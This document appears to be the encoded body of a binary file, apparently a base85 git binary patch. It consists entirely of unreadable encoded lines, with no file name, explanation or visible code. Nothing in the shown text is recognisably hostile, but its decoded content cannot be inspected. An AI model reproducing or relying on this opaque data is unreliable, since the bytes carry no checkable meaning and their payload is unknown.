zuUMSHy%#SmH$KEoiPCu6uBKq1L^VksP&|nI0FcpDYr;MM+H66|VZKkFHMA2A>;_sc
zaL(h<J=NcCIodOQq|RYO?(_ND2~j*t?y=uD^H6O%W5?sxmuoc;`A$<CoZqf>{7p?f
zZ*gAz=$n>8-2~5<VDW^A2=#&fFW&O=^kO#76ixe{YvY{>7NCrUid!Z2HTiHY?Y=oW
zSek#!x^&*apfMZBrk<YmTOgh~>xUQEe?Idn$+}x1Bg6Si+f%BZp55RJPR`7%KsF+#
ze$<g(z3Z08SPE4vQ<#r$_}1IX^RdlVE`3w77%eR9<TO{L`+D}4JJt}y>{~nb0hHf`
zcYEQ|ZQJr2N+(F&fA|9%_id*$Q{zhODnCImd^gi<^9E%U&VpmNR^JQDgCJRqSCS<z
zE{+0ODI{qUm$#&LyaRPi#P%ay`;EnkoqgNse>Vj(=fvl4fDace$K%t(hcV}N=UF~D
zR;*7>4yh~SN-jp#PA2T8=0Wm+4|y=nf#5J|?*as;&AkAs>`juEkT~`@i1^)atN%Mw
z$zXZgypWy2P@8`R)&o?F^BgQ<Z0};hrnQPotlHIukUcW_65V?Mgb~pzOtPHr7`e^P
zc&1lh`1RxH|M5{f=yGzEN$hbx+bs6(4Kp6=h5Dj;Qh&wOf%=^6?0D4q<FGPZcCZj&
z2?d=avDSWD|3>nqm$Uyn69^Bp={AoeVh6Z(KR6ZmE)5NRhv&mzKK^ef{Qp%l>EAha
z?%qGxmG-yazuMo?0Jp;u{`nJssn12|8#YJ<DV-g9wL~N>ACDEHHh`=9%VxM1&GJF&
z%4$uF$DU31_O>kVYDlWzz1h1|gXc#_fF%%Zh#(*^!B?tW>pe4-KdrpAOk>{ff`y0F
zh_wq>TKw(oW~5G?Ui$;?ONOJlG_D*}S%j9t6u*~nJ<RKCMTJJjM*nR|g@IE)`G5#H
zlL!fgt=kH$f}>kn)rsLYH9kJ>WYGvy&7sNt6P%tY=FeX`fqn3soP^1WSTo_JBXgC&
zZsAIW53K|(eF%ouhIgNx=P4Sb1e;hKY*l2~ve)#8VetezJ3IR1uU$W(+qr+g?28g4
zVK%WjcsF1eh(8o`5#hz~=MKlFgZ{!IgJCWhh&&PVA=gg1TN3j3%YDrdO%Xk7HnH7`
ztABvCNeM^U>SOP@;A|s#ct~6H_4P$aXb6_SxTirZr?<DaU$rbdqx!IhFqMV;u%8<@
ztbi#S{DN&&bn3&IW+mDxSB=?A5DGVM=6YcN`#aV<KfVqPR589Xc0zb<GunLI=sQ0&
zr`v|SaE7$~zE#;t{9Grq8+$eNL30=%v|3KX^|lazo&Au6nVA`xnsvZ4uiZ-&ECeEC
z(<V?|UTX9vsiq;z<}rEY0W+22+azzah2$2yq!p+5mg*P!V4XK%mA~~|x~8Bh+qEL8
z`ic?<#z6Rub)P2jqr$=m;qp?!*ReQjP;I{1Yym`^KbLSa$Sg2KVx9zcId`LSH>#*I
zi;#b<YNQPaQ};8=C8?Vk4BEzx3(1TvXt4~T0$le965f?CLuOIqFj4^8q)jkKf`8e`
z!9XnwzQxe~K6F$LS&w!uqge%6Vmj0(H(ZR6lN0~v$kPMzWatGl==&tj50o@)VcitF
z8GZepL<9Lpl^;GBd~k1guy09m_vOGqWp~}_gT){U;hF^hx)mywLz8d6yP!Y6_STti
z?p$pKgN+z;lMPlhZpBl!VYzvSB^1t{UC}C*C#BzUd;}y)9NHPNXblO63V>%b6tf_7
z?vL}TpD39_x03k#p?Gfvbv#t}@4Hn`mK*g-&IQnu2_P#mNlfU%L>GprejPBu`^E`M
zGVuQ=sVNddh8gApV<uC7u<{6Ji`m+N68zRyR=lJ7WWX#X@74*>FGt?Qu|O*ZR*DpA
z>Sumzb8P;9h8EP1?QNjsgAz{dK_?BdvZ-Ho9?lC#*ZlFXJjKqYnI~_(SX2V*OHpqE
zBwt^>A$*PWl-j||&cL2@pBhiiyqW6L32*h6u7H4mub6*kbs9KTd)3W~<E`D@fuBB^
z23FU7wABOofGOO5D`FuAG4kqdSOZmc@#GOqIDx@;`NA3_6=zJO|0On8ng$ALr|edR
zMPQWevW&1e$HDE|j;e}v-GYj3iQnXvwFNu+O#r_l-;|~P`BFK#m#}dtp_eT7uqneR
z@V8iBP|s>5*3zMw-xR>BCpmYwd!2%5rq7cntMNlPq0<EyUxXtIr?<RA4&od9nx(WA
zmRq-!qK#KVIf7ZDAgK#Mv6E<X%%7EOG{|?vB$&@QjsmcZ@zIDN9uWTlm)*BfpUi=t
zmuT!q>8w7#%)BrA6|Czb{`}Jq2VFc2TVy6Z`bT25j)@`iZU+<V$<!a~X8<0P$xt|t
z_+YF@MMq9nQ15LU*IPp=7l6Y(9(^8>V1k9jrRfK$R^)z*gRh{~o{rt%k@3P-Vew+W
z#Am1a&0YGNr1J9e@J6xDh(%AhND9L#cHP^j?tnY|P@Na_U2;gDhHK6T=Objo6tRU?
zRZuTN;YCsq;5#oqMW!-gWaUzM`EZOJb5sJI>4$oCkXSqg>+9>`*JK<#8275WJbLoz
z>-FvvKaP@sPzb*QkQWL;COKV+Z}(K5s`vawx6^(nXSkXF|K|1A#}(KZ5WoLVZ+cfW
z!~r-!KoSyFB9U7|l#Md@(&cu@_aRFXUeHAFC0KMF1tc2ImpsC`M=lhU!rON3+JXWU
z950+MOB?$E03p$r1;TC=-3ao<lt^A5C|Y661Yc8`eXT@doF%X2`7dG|a_pB79r4|N
z{f`zP&ojrk^nD$1i+KIbkUPX;4#qS0*f~cvzm4U0+)xTY>)^QFnne%SVW#KOdFdQw
z3z|`tDPw=Uw_PNq?Eu%gRXs*mE_q~_SPSzDb-vj1*_p{prK?4&C^nZ9P|CCg=RkX$
zUM)^>>-qTN_&%VO>D5}<-qY15ffihve8bNKidFoX6T)NSv%EA`D1oSGU)*&_3dTAh
zVsJ>kwQ_eI?dNMT3%PvxJiMr63evKDcZpFTNC|->+R^=R)&CpmJ@z>j+k+BN6oMHv
zfzJzIdSl|qzJ)&KYZhSLXP-v3TU~I4W4bRH3xb7y(Yp%z*$9u|WcV*&izLe1aspZ)
zummoJO}y^BW{psJ2#AV;#f(o#Py(Svcsj(q!f%Kp(R5S(t!bkPDQ}Ej#$8WBYDilO
zNL&dMmLS!Hb-t-*iyJO7CX<T<IY5f94Uo2FIG>{wY;wV;#-nf3*-+%|j#0k|!rw<J
z078?#`kL4fhx#-dc!!8D6+=B0kqZv%p%6e{5Y3;)o@I@l!1^GgL9qk|iuj9LyZFPG
znR;kz`-<_xeQjA8sYD6FP?`S>li1x;tOf~C{qygrgTz)WIE*2+sbU&l>HxFO0~&%x
zI0{ZlXN~03ocDI#_%-zun-!%k>Dyjv?1PQ>N_e=egI(2s)d&#Q#*<l8qYr;hk2S+Z
z9)R!d@SI9jD#0A)@-++R&fEUZGSh#H<M)(1b;%}6`V!+WL;}5%sEdpK$2VOv5(LEv
z1FMh<3ee8S>qn;m#MP+Ug*_Cvi68sojha7VrCE76^!tvk#8$`2$(i~IPFdXD#F!8o
z6?HW2#gE?!dPB*sK&1c>^w)DaHi0`wt;UZ-OtAzqcm)pjfI0EdAUTb6*CyHy7`+=f
zT;RhZ8k>^(_|B6j?+^0FgOgiX)`j_;lsMc!TZ*I$TrhOfB*VTXxDoLe=~c!SxN5U{
ze{_VW%FqOxWJ|>0sg?=g4wyqf`i1CJ7v#=HApcqbATx$>ui#l_3(IMM@`V4X&oGhT
z3KXfk77;;57QDT1oh^b6Hnm)MvrXN$O44B(_cFZFpxa)IC<;j2t39@cfG@QI65$o=
zzqNu_irf3(4f2eQ>xo6ww&CN`e~k0{0H^$)aej4{v`&8OJ>4j{k;owT`k&Z`36CGY
z`L=;l;MwPk+mOWE02KtilV^-`-#G2Z%nb=a;(WBa5_;`gX*eD-F9KwsS-O?khdi=&
z$Nl=#(z8uBN9NG!w`dQt;^Gco%*h&*xqkku@3QNL=TFYp+FL`vvpPL3ZB@;}wBo1l
zWt6=)M%~$%bvt6igCj>TEx6>H`S`4t_ou^|m}eofC%u1i<a*to9nn#$&WEc^V}@g#
z^QxZ2K9_Cxx8vvHdTit%_*fn*3w+qpl`BPSLZmgwm4spt@#h!6H=iAz$K-+=AZ!R5
z0j&5uX4xVwHkG`W(aN3!ARk3_+~yS6#(HwlwYO{ukhys+(t76TW15v%fF=32L{gM7
zc9FK~PErytDsjLVTR~YPEj(_|(mh5-OCto>^tNqd79ZTPc{4i-cNx~lkirXd#<jUa
z>2JrNK8I6G^mO5n&E3gI;M*iCbC3g4j27lBRR9CfEuT4jh!|M)88i#za0=ooLhiu5
zWW!3&1~QqC)ovWdEf$srq>bW(en4qwN?p#BYkC&#K-wX0bMI-_!DfsgrW`b*!s@;?
z%^S0+Yn^+W^DXvf;I!LSS9gFn9+^4DFKK%p=zsn4K#{r39?TEx!Kv)#)n+UCt}gcN
zL`F$iD+E(b$8I764yr(%@~En{&ReKtqKP}2wPJ6c>dZA-GC$ZYm1B*U$jKhgi{h87
zNVO`SOBKKNXmtmma3qkh2(%y(o?3H0FD5+PCbb$T=`H=`Z{Y~po}KQy&E0#$_!mr*
zaD&>3MkhW9tLus?HzOmD=y@UVWG!dLO)ci1HX8?|#l^WH=7Z9@J~sm=_@)Q?bWBef
z{XB+qL}w!7X=~<C@O-vXT$hOryp*8)4d>6FCvXuosY(#_-s6xmI~@^y)Z0Vb`ctMO
zeix4Xv@z}bv5#f$Dff2Vr>(m7V9qGpTYOdd(eI7VQi@e^Q1Q{jD$NDQA&of3pk_62
zo<N8K%zsR89#nQvXnqJ=CC7~PmXKrqy)*)pF0jA#lwpFfJCD);#alVw!1by<RJPEk
zv^MNdK=xnrak6pJzYCh*)xD|qbPL;C96EAC{!z>BTDb9aJbPwiYulK7W3lfM95Dv1
zG?tRKzL+yz%icdSYwS`&u+*~pd%3xi0APiNQ9ZxRMKQj8bd6M*8;7cv3xWtplgB7g
zc<MdzeMzG45fpo2)002GTaTEoS;R~_zT=J{ZlUX$&BOqueskB7^0x>r(wQg)^dVpM
z{SpnQm|v~h`sK_ddHxP2Z30mi@Oo$+igq>JyZ7s3+JRj6)NkYa1sG6IQbJt?Rxo#E
z-AT=x9yO`=Bn`-U?L|?cElD`!EbfNA6xNd5b$#`AT_KKpZI6g3iblr(7M)S|Dr9hQ
zPz8`XAa|F0S`O#hUW2}dwGN*;_ecv^y){}NyrO>`_ba?sfB?xHM6wOcF1>yN>RWwg
zycJhpMDip^j@~zprhmU(q*pcE@>nEyp;LEKbve_m@6)myCv>Pl{>u9PyncNy{rjr;
zLSFN%Hj%)<KrQ`g-?FHU?nqWZbXo$WuxZlAa6fF_8^bOzyxWgmph%JT*T3zLY1zBk
zLLW=+!VL}9?J~MhYn<n0uU~IQSE(fvF7HbVn|vp&=(Qnv?}L}#3P2nfLxWtDgD-s9
zMg1;hoYbdADa_{-vyP^2&lj8@p;umBUWgtt*}<t)x%4b04?-v6Z!Zoz7@|JJl!-aN
z22fG}A#%Z<qec{Tw9IDgc5ry~ZTznCdgugY(;i?yxK*#X5KWtNyW+)2PyKL=nN^hw
zB6l_+3@`NRRsY$UvHY(a;irU9_J+~QjT_CKDlz5Nv~n0hB`9cQeg<>JW4giKz4L2W
zc5P)3Ra{)8|3hUjr>Yj4K3}__0Q#Wr0YT?>9Z@{+kh1dfv@4JBSI`+yLyPy?&M8#d
z$sYEmE_q%Mk6+(iWz}dAM&YF0#E<W3lU!lN`ZR988mImz5Ka2rcluuVaF4lpFo*{d
z?+0{(Lcwe%L54rvh9!MZxzjT^c*PD5e}0Ddd!y8GL@FQSwv`SC4<y0ddog{qhm>%c
zIXOiLr~@=$gqici5Q95u@U-K%dR9}9zjk;6R3kJxhPuCKf3A4*b@vgn5_DS^MOo=k
zjfK>pVP*?;xoZP1?ftQ*_NOUm0+QUczUfL!s+^3A%yS>KA{Yx?o8;}HJ2=m4t@U!M
z=AhQgzgI($svNUVNK05!lJ~iJ2;eH?ZzG__%Y8c?UelcPsobo_A0p};IZRlm3WwAR
z+jS|flt?h_hrDZy%}|&>UcTvD28?>Dp2t66LeUeux?Q^7U(RtJVi%xnx0j}WuWP#t
zao>(|V-tgF(cp5?eNAVFciwAo#4O&h>0WM9Y`Ap2-|oa)bB8MRU>Mz%j16EPsYiZm
zw1}gubL0$F0FXOuV6rQi=qs1}OfyfZTdbkc93Na5W?jWa-)c*ZTKS-@EQz0<y;zy~
z$FAt5cRw%FV$(F;A-`k^Cyq}N*oUf4CbcEW?8d-Gm%{<(uCHmU+OTLpKKEEhS}FLk
zsjn0^9S){#)U|!X&E=Sg_g|&1<I~!EV)qe19KKAM!Unybr?CmXWer=YwX)2<5?=b&
z$+(lb=*BOmeq@7W7L}V3RcY28|L3pW#%s;T6F;d*4UdTMWg^n*c&MR~5toKW{&F6=
z$KW#m`Zd9G<B8ak;g1pR`_?uaYss+bg#-s@h`o0f#Zw2b8IY2a64`-Bl%En)aA<YH
z+>1k5mfM|QjPt&KBwwK$5D7|2n^Thfyd%dU!gZNwu;->PGPwBj@J8w^l8<zTOr9KB
zRPvq@<j64h9N8aeohi8Pm5A1RI9Bg9q@v0Tn?C+Zyk+Kk-)sRZ|F%c34Q}F48HBaT
zSniHZwtCESH6tO0W}D_S{7A~=`+d8&51}Bu2qtPrc_y9dZ@kor4k2J8;tknDTa}nY
zLqmsJOZ@%)2`ZT8`dGx`9{P|pC8obDcbgUUGq;utT#JyIBZ@=M^y}_jZWU$(e?;B!
z1#dcUcTdX>Ub=15pthWZop#k#Fw{Owxu$EBH^36Ev4tvE3x08*jD@qCQBr@vDM)I)
zD8nCZlZw8DUD?yv0mnk%%5pi?Hw76uKho8xJ@&kGkKXV0(x0+jS1`E{nDTUKK5!dq
z=y_V&*fXx8PbdDPEIJ39FfQSuni?UJRaFD?tK#8GF-M<g%YC^hfcbdot%e`&aygZV
zYstLyL~!4=*QX4qpD}7k@@&KcNjU|DQrsanoQqzkE|J9=Tl~s<=4VH-`Yp4ITz~`t
zeszA%S+~%mN9k3PBpsNSe`ajfp6?%$7l1WClv?|<d)A-FO55Raqi6>979`D$A`F~0
z2vZ2U9fTed$k<z8vyM@+miv~6^Sze2Qe>=kXyMp>kmG5+9}z0IU9~34^sZCM>(}$(
zjD>wsIKOLMejj2*HP&`deevU`BO;N1!;dRsOUhjE#?v!H9?d0QMojsz^X&wsW%X%U
zjXZi$AncoAky&_lK<gg+TihAQAmw>_;J8vCef|0c41aW!+uoheGe@vl;Fuv&&X{tx
zT`=Wp-P!wU)K>K;3kB!@{T|nzPgz2^w&7?DYvV8zVBpbiK{zA2UV4pMhPb-><Buu8
z5+U8}9C*sDqg_&5e6iwoR2t4tNi~<UKF4U!Qo^04rGDHv(Ycr^5Oca+Jf}{c>jG++
z?eB0ue1D(LnK>%Qt@3ULod$cT<7qurz(vF?j=BqtyYaXAA|fp{yEQ~+dvzzd(|2P?
zxBYN~-2p1M;9dL_K_#!&l6iV`wdKs7r}xr56%`ct872Iib(<dm#Ro2WHR=DcWG>PU
zWS(5a3}T4{mljf4sY`sznB;>j$`nzp9|#gEfN6a0`8lWsN}*4K(wc(cOkg4FWtos0
zW9}Cp3`o#8)6w!ndh?Z%oQ}mdipj=&U$<`AVm0*b6>QQBD=WJ1Om>KqpI7_GKLv5Z
zg&D)Km-kgJ9`l1=S-mlHsOcWT(e}(;cb_HRlwB%Yn9t*HVUNj3#=enAtKB3_M;P-T
z@6zT3jVY{LS=Hw{F+P6q^>s|qek*Lt9(q)AA-%hzx%X4nzP&5u<#$#phbw1f1k78o
zqwm&JHIqi+x$HP;nLrE=NEYqK9b5G^RhCI<trW5h2zdS)|Fld33q1gA5!{3N$oqZx
z;KHqOXfqZmDD2*A-q{TRTMGyn`sGV#Q4A#CT)ucQl{pd)vm{*`7z%NL9<s5y==tLM
z6sC~gUuxtr(sdq>m56}=58&f#TV><)nb{8n{z5~!uw?+NfU$_~hey4@P_5411VBcP
z23Va7(9sjpmtKfH*}Jf`{?u85PW1H!BN%{K@}c&7S#XZTQ+?^}J?@$jxXfd;=iH7v
zzHm=sBD9j-2RSIY<}VN5aaFBqF5NapmSt;$GzAHgJoG{w%Sz~8@nKu=XRT&1I}CN^
ztvyQ#A_>*JH84VqbyYyrFboQPdndV-x?rHa0@x8qcJ9ar6VW>J8egvaL2E?8jQ|zZ
zMM@iR0rD8|{sIw+nAmF@oIL7shkve8JLK&oz!Sdvc#tB*ZwnEO99!t~{LNzRUjJ3?
z>7jcg%sI)gMZhL;XcL%;SfBv^)Y9?VD4jyP)mfgK6QBT~6br=vBG=j+^{Ff+EGY=I
zgtg}qt8<}Y^CPam=x$K&L9?76KTAQOPlgqt;PJs0FS{kaE_mBTAnQ8iXuY;pPJ#w`
ze6mIRN8jfK(AQo-v<<q!A7?fYx&UAFRb4OgOd=%h(99Tgy8&N91WIZTMvxyJJENPr
z1Oj*b7dQ4$GQ<!Aiu|D(DgufCDvE`LrL*Db3iC7HW$RT$s=fr#vK?CkGNb9Cj-yxP
z;pY1zA{k%Rp*e3}!CvYz;kj6dfRQmrU=9jVqo>Ehjhf7FUgScKE6^)~)-Uw@p@(?b
z8tto*dquSL&COSqXk%5g;a3MBqDunX!_Pcrer)aG*Viqfx&S2pz}{Zjqz9v)LAv<i
z%OU!qt1cx3NGs$XCGkmb>X30r5@pqYyxD}Fi3@3MD9mkaxkcvBCk}@fFJ4%A6VC#r
zduUVH0;F2v@AD(H4<wfQ;7cKdXqk#f&mb#O#??{O(%{<9q}4SOCOH|{dRB<#gy`y=
zc?!uY+P000<doEzd+dBS|F~3X)Tt@dQ;GoM$pCSX1fX%C(YTCY(H{MvCqQ!(a1Xxe
z9>KqzxOVU@5AQ!_R1|LeO4y^9U##^Lpb$<R)mCx}!{UZS&V)v155g{Rag(e9+zW_P
z{Rqg_sH%R{1ZN-S{?b=&ZNRLtK)ZY)-}}H7(BqO{T0DAF(Q*#xOB}=`D)?W^8CS+U
ze2mQq`T$viU7>iqVKwZ@2`CsueYqY_|F6sWB7rb|uD3dIaI&9dy<*#*1ZQz?Odg4T
zXb|j!B=5GjjHaj+@-~2hXzqQe$ZO3m%J{n~D~c@gWs;t#(yY}>kRgBINx|*yf0{NJ
zMuwAgN(1L)v8`W5Pf2FoIe_%Kl`Ca`*4xH@K7T-ox0UO+4q1SQ9$*=nQ!*{XjBZ0m
zh&<&j$ku>bm;@a`clfFI*t9i%6iFC`0whq$13^C|rITK09kL<d(xpo|W}5>nlL~y9
zzYrOKGR{WSRGQUHJBm)VC!cvpegj`^ZLQeK%H|O7v|j-$fEpbfI^RDK;sY`NEb&K(
zZ)5Ws^qWkue}rSf;RtT@$mi@e&|n^1vvxs|;uyz&e(?4a!BqXmCO3u0o|A4Dx=7MT
zj@kZSz)<Am+<$vk&L@H-42AyhuUpDl{$~S$lZ8$d!00otXNmM%cypM8nblZ(Uld{z
zO@`5vBcVl;=t)rKLa%f^F_Py~Vs+q(PrK_16*b%5*^V`M6p4K3wYYG>;;h(&<C!bx
z-puyStZ`cC#sA6dn^$-8^kKEhQ<z4_4|p^&;X3bd$c5ipS}QI6gef65J<PTRX=yX|
za|sXKq<8PlPZ#ZsL0d7obRy&)q&iQ1Mx;|g*sPpZcZW&QhGMC_R!@PPrK0PD`|b~=
zR+Lu^ybe8aC3}@fa?A<#*ujk_cROw!cW#Ny^7`XZglYKaj*%1QTi>P0Fe)$loC%UR
zM3ehj-P|9OwVWAjp%VOZOi(~YmYRJ?O2TGsVUVlx$>|Rx%j+Ik9^Q22oV`Q(##q_<
zj(htwwALIrKT*@wTJKs-_i$eOq2Hqa-A@vNN-u=X>CkY0ZF7P5Ts-ggeipL6{z7Cb
z@z8zmZ>i5YrGT2+^;x2xJUBrX1hq(ECiCL$wpud$=rwNWt=Mvo*Z;~7>g`9m#gE4>
zyl55YU%GWg>f!$D%cUj@9<b6_wJi70rm{}H%ohpyxH)w|s-I^Sm3-u^#15HB;m>k{
zn>T-6<|+^^Iu#<wxG<~E+dP=JM@+bLa*KuT)FFDjIdhIUm(sA+9;d|HJ6v~I+zh^L
zvpwyGTaxG@+S$p*XJMXc>umja{cAl84ZnY)@WgvaWi_9{igNCM@t^DbAr}w*v=Q}l
zzWv50;)iHYqCX4PIhYF7jLoJ>JG^oji0uq14AZ_AGTWHdd?jnGP`<^4S(w+)2^*I)
zSwdx+V#EDPVY%<p_L9H;^ZZYW&x6FfGYM>O7b|R>vx*wgZ@ThsxZzdnGLKD~9NHgB
zlDbls`fOM->ci`QSNX<)Z<lA?)yp);`#MkU--ySTFHIhM(|_Ec{OoU$es+#rgYNDm
zRGwtkn48D+c)>%jjs1>O3z2i=qDCG31=)jP^4<s`A%z@hJFuI$IEogW$UO%V@fF{Z
z@_B4gJO0F>XIXY-(ZJZ)1$ci6iwOAQ-Pc@XmSF31Af<OME@L#n1O>xiEXIGfdgcj!
z5Wfo{y>i<TBO=7)0tfa)W*XK{76D7>-K?(vJcv3qN0X7(h$uYMJOh(o^DR}KWXM!@
zkfHz{5|CRRx$eY5+>N~hsHx3?`D!wV536U;KO+hX#7(_)a4i}{Cjc4}>?POSxrI>O
z3_?Eg;p0;-oY2;AOF*JX5>(aI)u{*%g7PFGH`i2dJ~DJh&LD90GKwERCd?!jI>8z!
zp{N3+g9voy<lrF4t?2ivj0?)s&kzt!qerWs7R21ajb!p9*gvEulG@EM<-p3u!<X|;
z{9qU7ij^M!L_g7!U+T;2KbGgYTh}DhW>J|Y(|biz{L}}F3~ki|7e%X|o;(s!@hI1f
z#(L{j&>w3n_V53NQxkCtF-$|?3B5}k5GPUs*q^qf=72bW1_vlFq2_=T5EUDYFGfB4
z5U@<59M5qs^uY}aoGcZfN@D*$yPio;=`zhDBWG6x=4vR+a<?6k?b?~R<U`BQNCnqU
z{`1%j9^ThRzYkq<a*1kYKScZ1Q=aP4cki0Uyj4`u<H=Vk3-}$LWb=MLw~tdY`;UET
z>FLR%FQO%_rFJ&6VuEZzLdeFscv*P=<QATtY@R(7(%b0~x4c8KgQQyuwBSw(zkQ-H
zV`uIotflQkNG;Q3i1sVndKcL}TzSgsqUzR31B9dEN59Q-wq;{y*TPH%pcTxJkW$zW
zWo*31TR71|ogLbq*l_~0D?t;Z4Urp7?&_~Y*yWXohyY+De-9%CKdp(i4jfu)BVUoq
z+~1BSmssw2RMH4BLMD(ER0^crWpbfJ6J^!Wm>FLT&W&WF6I&;AQXGExFDx`V@so!Q
zApwohdrU6Ku2H9RAkqYTX+=z_xE53%>)1FrNWwS7k3`Uf>hbChS&R)1vUWlkFClRl
z{-}Z%Enduumq>!up#WdZM{Te|j697F)$paG$hEj&kjO4zeD-E8Uf?fsV$t0wemApR
zcL7yZRZ#POxLt5tz1(SZthC<lDa__(ZxHv5uS0}g)#}5%5DI89(6c}5p*@kT+K9{U
zCq6U$W}zF*aS#BzxN_}U$DSNY35z?j69Fj^P>_5km6J3)T2%k3&`e2Wi54tXTfBI&
z7Q_9=+pS8chYq0uF}JS()6G1dg%H3X<Tx?>@d9={>Hq|RghD_T_&H(DgfEsn2s`ub
z$d#3R;!0Njw{z2bTkK~=*!0j80w@cGdl&RJ8C3hLD_42nBqAa*uxljX*pnS=GhTOa
zZsZi_g1SO(`~2JQOlHR-A|os!LkgCi8*ndS&5ur1IK%R#tbQ?#b&=IB|JP3YMHpyU
z(KZ(YR98ZFs`~Vgn)}0bw2x?K?e&@vsgDY_^W7aDv>>F`B;Oe|Bi=2>afA)w$!`Vi
zDbrtrX}FitUWjWw`I5+vpYDA8uDw@chY2pL**3$uL1w3O;ua=sDXI(zi`-T1IU|X~
zeeeZW)~4-C<(B!EDla^#<F-l5vF*#x*lV+lsz;JP&OW^-c4MinA)k|5+ZSv*KC?fU
zX>3uTIsc;tK)9AUEIp~ox|3hfD^c|GIEf(vFaUH)P)F>V%AqMLzOnLYjvDhx?6|UN
zy!U8hMzW0A_{~+Z-23(P&fy)dKJrF$Z&Up#&7B|a++`0{_OwIx0R*o^a)kJ7{6pG!
zkaEcec7rz>5lM+nV4Cgn>gy+TkSqeXyk}>^esoPtU*F)d7O7YQ(5Zp1w=BQ9j1=9N
zF0^P7%--=uy)PAme=h?++xnK7`clHvNc5dm0}6I9^Z^Jtef4Dxg?R5#xZ+qULbp}?
z1L&DA^Pr-bOdA@GxVr9}qCk}J|J=dx#h>L4w)>@{$hcj@<ib7@tur$)Xn#}5*<#m;
z9!zQHxKlRL3~6*E1)5fRe7(3tE-yM`?Z>t<LFZue#0{1C-$dQpqihfLKVO5(0!Sy3
z3gC1y&2ihgcLpmXK3BQeAV(5vLdk>j%R;LpR1w|@K{i#u(u9(EMxH`KYS1<Wru0-)
zR1k3xRRBlJlDmxutRCU`#T^N3LZAi(F?0(rZM(sS%^xPinOi-&nrGdzHkf|T_oYF^
z5_2dP0F~a<b#F6;QY-~Fajto*B+A-(<}B$tzjXV=op_!5>yj6K3i~`z^B{JQxn6Kz
ziVK#!bdSr_^z}S7sYA3%qjg1xvmVZ+XXUv~Pq-2lIojgPv&PHSKyqp_@M^;=_0_$m
zRM3&Y2fD|=;E%f?M@-xdK7&>R7TtE0wkk;xMTAIm%9YpB<5ikh&OL6qH!tkRHD`;6
zvfSCpk=Z!OWJY?_>pf@Fjr#Toik>jxT}2IeuA#eD!_}rs%ED?FEcIY3!_>6~R+?t+
z3G3_eC<u2pB0U*MlBIG<rk9kE1{b}32zcwo?_>}$^R}{?*=f%A`er`Y=QFB)Bx86*
zeLfFVAL}6SI8X*9Z~HmsW1Mh-p8m}r<}Fx0xyyCN>*fXzQ78yRzsGuxM)h3a<lVRb
zKM-nNs%wAKXL<_yHK5Tn;koBC54}PMt;rx&0x?pjzK+#sw&K`{CKC?@K)kIZpJkN1
z?Oz0O!M48%Vk<2w1Gs`qwi%nlr%V>ywaBqM05s#c1SpEkmz5+>vp_`!(;foR$?F8`
ziD-T6e5$qyk|zAn3(ynVH|I$){Go+h|0E^7nun4Lhd54?;i~mvLxk}Vu!I~W%*CX4
zmBS|$s=zO{u4DHV@%-7DoSvEeSrPxns(vDA62-jI9!gA1bDDc+@3I}NmL;_)mdNqU
zE53>$x1!R10!B152Y$nel#@YYO^K!xI}f%Lo?n|%ebu6B3RNV%gHhfdE3b|+d116e
z){~}FTl4*nJ(;`n@M^902Hh*?6kWdW$>|XOI8kA6zx2Mq+6}s^x;F=RUDDFW8G?6|
zn)3SQdP6swuGq_s0J4ge{5>49f9M}Ma=&)$JC<LxAcI>+P?Mu@V!GRAxOB>c7d7b^
z|7^r<Lw)@(7J)PDtEecc7auuB#kxM(`D4+AszxU_9W1)xkGtxpauzX>btXRq1l~3^
zWko-WZM9_}L^j)E5+HF#*e|(rLDy*R*>lCnpfeUMmT-;fUkhpdVy0xT$zA9PZb3i}
zHkhaY0QF)GFamBO!+6J?z4V_fU$9&6?@tsZck9pTM^()V`$!N!;gDTNhKK*0dR?ek
z`+K`WYJ!efZ}YXY5AMZ;RX&bXbA71NUHBmaR{DZWVSa&Is6x|95q|$?jW0%%c%_xj
zMI4VoqR1>_D1va#fq-W@(-v;{81Qd>io<cDBwQ*y*HJtQI$@Aad_GElR06eQ5xdsA
zh>mj6AkBL}TWCVvu@IDZBwbR=d&9N%8z<+Do*X^R5~R}wukS0LTBzcXF@FK#(ZET|
zL^CL!q|VIfUb~(6$PPi337a~CVHggv+)aHBV`*4D2eu?4dbD6}CONSgn~aUcaZtRu
zeQ~u{@UQEaeK|Y0?+B%XB-fE|ZDUakP0hItZ}CWE{hqb6#XA))4IYuuXcXJLF0dy?
zh~lL(!<xJAxt^W2yrjD48;73{=f(pRZbiWRg=f#6**9WUH--%XvoYX&j$i~W1{4L-
zl#kxAbE}WILdPH-oFTEVv+ya8`@t^OuNzK}HJ*}E>liD|$4S>xecnXgc^zBm&q;B`
zyd383bV;+*{3;%NCS<x21M%j6Z0kx#wjmk5fHPm!iA~dnS7o1NfBE{jyIphM=hB>>
zoZwD^GZ#Be=vwHSX8&#h>S2%TC98#HqJLhPU;A?sK>0sZ^PZ)`qNM;8gA-oAROI`;
z!y{MNS+@&5ijhAsR$-1$=Gk2a2BMg4bj(#K;*lzHS(r(s%LHy;QU<N|#TJG{B;d>R
z0y@MH`X^#0=a|S`3dDe>Pr0XSc6Eyh<V{&TKeLA5NGP#zz0IKzC=+JCg!p*v=w;Rm
zgYuSx3b%W@1#b&J051G7R8m&Zn0?H2T<qlRJcuXRAgtG}GMUT8mDZL&JFP%rc8D~*
z6*lR82U`yoU2p2hRFqennOR-hFBwQ{;77GFl&;0rAB7l&_I?0!D4M8h-lSS@r4*1O
zja~==H>x{_UyMZ5@~0Qlr{~`nX0%u6u@s<&D{ieXs+Dcm9S%<jr?IxQnN}EWbeigT
zHe0ZwmS;w2I(0T=di0cLE!$h%)Px6s#0Tj})@|kCWE>4Xc5%n6sSRIRTdf5ubTuPw
z5Kg~E?`zlOdx=LYm6j-ue||w@ec>IivBM#}EJDe4Jgo)4=JJW8(yXinzGbV;g9{K%
zp(%6IrnB6mpx*i8SDY0@GwPnH_n6F=0c3<ytrYeW4ti^tEv^fq$3w#-JDD@YcmF{)
zWsL$kC@72vwWx8RGO&hj<74h=Wqh{H0*6+XgL~noYr}*c`A6lh3A}9?o5bNUJ7P|A
zPX8||df)#pcitKc7si!O{T!B3^Fq4uYlSAWD6MaoRzCo4gV#vX7H@&xqS1A)uYPsQ
zj##>xLCSs~9+}}4;487{&-Fof9*1g%EXx<S`ZH*PT`JZAHa+36F=Yd%ivn43iMq&P
z2kJOTcx<k{ORZh0eb8NN^?r8Sl+9NbwL4z4$KD5LTL_>T59bA-F;w@8h~lS&vo<2s
zT~M|Sx1-GD`o@J-qZV-!Yy@J*hQ75hp=89QPJSp~W#GKbqsz<IIW%j2i{1tRre)m=
